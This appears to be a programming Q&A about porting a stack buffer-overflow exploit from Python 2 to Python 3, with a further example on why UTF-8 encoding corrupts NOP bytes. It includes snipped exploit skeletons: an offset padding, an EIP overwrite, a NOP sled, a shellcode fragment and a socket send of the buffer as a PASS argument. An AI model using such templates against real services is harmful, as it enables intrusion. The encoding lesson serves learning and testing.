Exploit development in Python 3
Question
I realised that exploit development with Python 3 is not as straightforward as it is using Python 2.
As I understand, this is mainly due to the socket library and the added byte datatype.
For example, I could not figure out how to translate the following code into Python 3 code:
--- SNIP ---
shellcode = ""
shellcode += "\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
--- SNIP ---
offset = "A" * 2606
eip = "\x43\x62\x4b\x5f"
nop = "\x90" * 16
padding = "C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
--- SNIP ---
bytes_sent = sock.send("PASS {}\r\n".format(buff))
--- SNIP ---
I tried the following:
--- SNIP ---
shellcode = ""
shellcode += "\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
--- SNIP ---
offset = "A" * 2606
eip = "\x43\x62\x4b\x5f"
nop = "\x90" * 16
padding = "C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
--- SNIP ---
bytes_sent = sock.send("PASS {}".format(buff).encode("UTF-8"))
--- SNIP ---
The problem is that \x90 becomes C2 90 in memory; it took me hours to figure out that the issue came from my code. I also suspect that this could alter the shellcode as well.
I would like to learn the proper way of doing this in Python.
Answer
The Python 2 code essentially builds up a byte string. In Python 3, '...' string literals build up a Unicode string object instead.
In Python 3, you want bytes objects instead, which you can create by using b'...' byte string literals:
# --- SNIP ---
shellcode = b""
shellcode += b"\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
# --- SNIP ---
offset = b"A" * 2606
eip = b"\x43\x62\x4b\x5f"
nop = b"\x90" * 16
padding = b"C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
# --- SNIP ---
bytes_sent = sock.send(b"PASS %s\r\n" % buff)
# --- SNIP ---
bytes doesn't have a .format() method, but the % formatting operation is still available.
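The following is an added example, not code from the question or the answer above. It builds the same buffer shape both ways (str literals plus .encode("UTF-8") versus bytes literals plus % formatting) so the UTF-8 inflation of "\x90" into C2 90 can be measured, and it goes one step beyond the answer by showing latin-1 as the one codec that maps a legacy str payload onto bytes one-to-one. The payload and return-address bytes are constructed placeholders, not the original values.

```python
# Added example (not from the original question or answer): measures why a str
# containing "\x90" grows to the two bytes C2 90 under UTF-8, and shows that
# bytes literals keep every byte exactly as written.
# All payload values below are constructed placeholders.

OFFSET_LEN = 2606           # same buffer shape as the question
NOP_LEN = 16
PAD_LEN = 424 - 351 - 16    # padding count as written in the question

PLACEHOLDER_EIP = "\x41\x42\x43\x44"   # constructed stand-in, not a real address
PLACEHOLDER_STR = "\x89\xe2\xd9"       # constructed stand-in for a payload
PLACEHOLDER_BYTES = b"\x89\xe2\xd9"


def build_str_buffer(payload: str) -> bytes:
    """Python-2 style: str literals, then .encode('UTF-8') at the socket."""
    offset = "A" * OFFSET_LEN
    nop = "\x90" * NOP_LEN
    buff = offset + PLACEHOLDER_EIP + nop + payload + "C" * PAD_LEN
    # Every code point >= 0x80 becomes a two-byte UTF-8 sequence here.
    return "PASS {}\r\n".format(buff).encode("UTF-8")


def build_bytes_buffer(payload: bytes) -> bytes:
    """Python 3 approach from the answer: bytes literals and % on bytes."""
    offset = b"A" * OFFSET_LEN
    nop = b"\x90" * NOP_LEN
    buff = offset + PLACEHOLDER_EIP.encode("latin-1") + nop + payload + b"C" * PAD_LEN
    return b"PASS %s\r\n" % buff


def utf8_inflation(s: str) -> int:
    """Extra bytes UTF-8 adds versus one byte per character (0 for pure ASCII)."""
    return len(s.encode("UTF-8")) - len(s)


def as_raw_bytes(s: str) -> bytes:
    """latin-1 maps code points 0..255 one-to-one onto bytes, so a legacy str
    payload converts without inflation; any code point > 255 raises instead."""
    return s.encode("latin-1")


if __name__ == "__main__":
    wrong = build_str_buffer(PLACEHOLDER_STR)
    right = build_bytes_buffer(PLACEHOLDER_BYTES)
    print(len(wrong), len(right))                       # 2712 2693
    print(wrong.count(b"\xc2\x90"), right.count(b"\x90"))  # 16 16
```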